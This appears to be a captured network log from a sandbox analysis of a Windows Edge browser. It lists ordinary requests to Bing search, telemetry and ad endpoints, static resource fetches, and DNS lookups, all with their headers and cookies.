cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628&WTS=63873871427
ResponseHTTP/2.0 204
date: Thu, 30 Jan 2025 22:04:23 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274663.1ad1dfd0
-
Remote address:88.221.135.16:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 922
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628&WTS=63873871427
cookie: ipv6=hit=1738278230220&t=4
-
POSThttps://www.bing.com/fd/ls/ls.gif?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1738274662554}&log=UserEventmsedge.exeRemote address:88.221.135.16:443RequestPOST /fd/ls/ls.gif?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1738274662554}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628&WTS=63873871427
cookie: ipv6=hit=1738278230220&t=4
-
Remote address:88.221.135.16:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 674
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628&WTS=63873871427
cookie: ipv6=hit=1738278230220&t=4
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request200.21.107.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request16.135.221.88.in-addr.arpaIN PTRResponse16.135.221.88.in-addr.arpaIN PTRa88-221-135-16deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request74.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.ax-0001.ax-msedge.netg-bing-com.ax-0001.ax-msedge.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.28.10ax-0001.ax-msedge.netIN A150.171.27.10
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid=Remote address:150.171.28.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=2C1D653ED2946A0C232D70BAD30B6B4D; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:44 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E613FC0A006C4686B352C5499CCE507F Ref B: LON601060104025 Ref C: 2025-01-30T22:03:44Z
date: Thu, 30 Jan 2025 22:03:44 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid=Remote address:150.171.28.10:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2C1D653ED2946A0C232D70BAD30B6B4D
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=GKF5usGVYVXKvElg6OwlK1UflsNPzPxwR2K7Z0xbMLc; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:44 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C117727A6424418AA9F6771867232010 Ref B: LON601060104025 Ref C: 2025-01-30T22:03:44Z
date: Thu, 30 Jan 2025 22:03:44 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid=Remote address:150.171.28.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2C1D653ED2946A0C232D70BAD30B6B4D; MSPTC=GKF5usGVYVXKvElg6OwlK1UflsNPzPxwR2K7Z0xbMLc
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D4F418D952AE49F88A068932C708513D Ref B: LON601060104025 Ref C: 2025-01-30T22:03:44Z
date: Thu, 30 Jan 2025 22:03:44 GMT
-
Remote address:8.8.8.8:53Request10.28.171.150.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request5.114.82.104.in-addr.arpaIN PTRResponse5.114.82.104.in-addr.arpaIN PTRa104-82-114-5deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestth.bing.comIN AResponseth.bing.comIN CNAMEp-th.bing.com.trafficmanager.netp-th.bing.com.trafficmanager.netIN CNAMEth.bing.com.edgekey.netth.bing.com.edgekey.netIN CNAMEe86303.dscx.akamaiedge.nete86303.dscx.akamaiedge.netIN A88.221.135.1e86303.dscx.akamaiedge.netIN A88.221.135.24e86303.dscx.akamaiedge.netIN A88.221.135.17e86303.dscx.akamaiedge.netIN A88.221.135.3e86303.dscx.akamaiedge.netIN A88.221.135.16e86303.dscx.akamaiedge.netIN A88.221.135.9e86303.dscx.akamaiedge.netIN A88.221.134.3e86303.dscx.akamaiedge.netIN A88.221.135.11e86303.dscx.akamaiedge.netIN A88.221.134.250
-
Remote address:8.8.8.8:53Requestr.bing.comIN AResponser.bing.comIN CNAMEp-static.bing.trafficmanager.netp-static.bing.trafficmanager.netIN CNAMEr.bing.com.edgekey.netr.bing.com.edgekey.netIN CNAMEe86303.dscx.akamaiedge.nete86303.dscx.akamaiedge.netIN A88.221.135.48e86303.dscx.akamaiedge.netIN A88.221.135.24e86303.dscx.akamaiedge.netIN A88.221.135.16e86303.dscx.akamaiedge.netIN A88.221.135.25e86303.dscx.akamaiedge.netIN A88.221.135.26e86303.dscx.akamaiedge.netIN A88.221.135.35e86303.dscx.akamaiedge.netIN A88.221.135.32e86303.dscx.akamaiedge.netIN A88.221.135.17e86303.dscx.akamaiedge.netIN A88.221.135.43
-
Remote address:88.221.135.48:443RequestGET /rp/pnQekwGX3mbGjW4IGiGST6jTzVM.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: application/signed-exchange;v=b3;q=0.9,*/*;q=0.8
purpose: prefetch
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD3C9A4BFBFF50
content-length: 7900
content-type: text/css
content-encoding: br
content-md5: MpUr4yIwdmWoRwYJ/py9kA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 72b6c426-601e-000a-21b7-6ef319000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a1777b5c.1737777063.6b050b6
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=125627
expires: Sat, 01 Feb 2025 08:57:34 GMT
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274627.f6e559
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/eeSRHmOwBCiYGkxCHmb9VbJ2hT8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC64632A6EF0
content-type: text/javascript; charset=utf-8
content-md5: +CLmYDPZ4qSTibcD/NDa/Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a2522aa8-401e-0059-3995-23ef16000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 367
cache-control: public, no-transform, max-age=129503
expires: Sat, 01 Feb 2025 10:02:11 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e730
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/cmkA5GOzehgW38VorLIwEgHFV24.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD0492810643B3
akamai-grn: 0.a4777b5c.1737498009.d117a50
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9016
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 2IO5S7s0tim307PiM027GA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 391ee43f-701e-005a-7656-3eec11000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=13858
expires: Fri, 31 Jan 2025 01:54:46 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e732
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/CBYihxJekbyAlLiT2TGCv3XcxBA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C28AC2EAB8
content-length: 2634
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: YP0IUbsZfddh5LfrNKc0vw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 27aa3268-301e-0074-5e0d-236cd6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.9c901002.1731584124.4b80bd49
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=176883
expires: Sat, 01 Feb 2025 23:11:51 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e733
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/KLrSbzDKMog0mCiPcB9iwoEvlE4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC61D9BDA003
content-length: 932
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 4vFQ72ZNf8ORyGv0/A7BUA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 837d4e76-501e-0002-1798-16e86a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=217509
expires: Sun, 02 Feb 2025 10:28:57 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e734
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C30DC01669
content-length: 250
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: e7f/zlZuzAgnEk3uqGLnHQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1c8cd8bd-201e-0060-58de-1aafb2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=83320
expires: Fri, 31 Jan 2025 21:12:28 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e735
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
